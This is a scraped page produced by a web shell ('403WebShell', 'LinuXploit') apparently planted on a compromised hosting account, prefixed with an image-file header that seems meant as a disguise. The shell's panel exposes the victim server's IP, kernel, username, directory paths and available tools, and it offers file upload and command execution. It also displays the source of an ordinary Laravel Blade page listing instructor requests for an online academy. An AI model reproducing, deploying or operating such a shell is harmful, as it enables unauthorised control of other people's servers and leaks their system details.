����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 3.21.126.72
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/bofirmacademy.com/resources/views/instructor/course_instructor/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/bofirmacademy.com/resources/views/instructor/course_instructor/index.blade.php
@extends('layouts.instructor')

@section('breadcrumb')
<div class="page-banner-content text-center">
    <h3 class="page-banner-heading text-white pb-15"> {{__('Instructor Request')}} </h3>

    <!-- Breadcrumb Start-->
    <nav aria-label="breadcrumb">
        <ol class="breadcrumb justify-content-center">
            <li class="breadcrumb-item font-14"><a href="{{route('instructor.dashboard')}}">{{__('Dashboard')}}</a></li>
            <li class="breadcrumb-item font-14 active" aria-current="page">{{__('Instructor Request')}}</li>
        </ol>
    </nav>
</div>
@endsection

@section('content')
<div class="container">
    <div class="row">
        <div class="col-md-12 mt-25 instructor-my-courses-title d-flex justify-content-between align-items-center">
            <h6>{{ __('Instructor Request') }}</h6>
        </div>
        <div class="col-md-12">
            <div class="">
                <table id="instructor-request-datatable" class="table">
                    <thead>
                        <tr>
                            <th class="all">{{__('Course')}}</th>
                            <th class="none">{{__('Requested By')}}</th>
                            <th class="none">{{__('Share (%)')}}</th>
                            <th class="all">{{__('Status')}}</th>
                            <th class="all">{{__('Action')}}</th>
                        </tr>
                    </thead>
                    <tbody>
                        @forelse ($instructorRequests as $instructorRequest)
                        @php
                            $relation = getUserRoleRelation($instructorRequest->course->user);
                        @endphp
                        <tr>
                            <td>{{ $instructorRequest->course->title }}</td>
                            <td>{{ $instructorRequest->course->$relation->first_name.'
                                '.$instructorRequest->course->$relation->last_name }}</td>
                            <td>{{ $instructorRequest->share }}</td>
                            <td><span class="status {{statusClass($instructorRequest->status)}}">{{
                                    statusAction($instructorRequest->status) }}</span></td>
                            <td>
                                <div class="red-blue-action-btns">
                                    <form method="POST"
                                        action="{{ route('instructor.multi_instructor.change_status', $instructorRequest->id) }}">
                                        @csrf
                                        <input type="hidden" name="status" value="{{ STATUS_ACCEPTED }}">
                                        <button type="submit" {{ ($instructorRequest->status == STATUS_ACCEPTED) ?
                                            'disabled' : '' }} class="{{ ($instructorRequest->status == STATUS_ACCEPTED)
                                            ? 'disabled-btn' : '' }} theme-btn theme-button1 default-hover-btn">{{
                                            __('ACCEPT') }}</button>
                                    </form>
                                </div>
                            </td>
                        </tr>
                        @empty
                        <tr>
                            <td colspan="5">
                                <!-- If there is no data Show Empty Design Start -->
                                <div class="empty-data">
                                    <img src="{{ asset('frontend/assets/img/empty-data-img.png') }}" alt="img"
                                        class="img-fluid">
                                    <h5 class="my-3">{{ __('Empty Request') }}</h5>
                                </div>
                                <!-- If there is no data Show Empty Design End -->
                            </td>
                            @endforelse
                        </tr>
                    </tbody>

                </table>
                <!-- Pagination Start -->
                @if(@$instructorRequests->hasPages())
                {{ @$instructorRequests->links('frontend.paginate.paginate') }}
                @endif
                <!-- Pagination End -->
            </div>
        </div>
    </div>
</div>
@endsection

Youez - 2016 - github.com/yon3zu
LinuXploit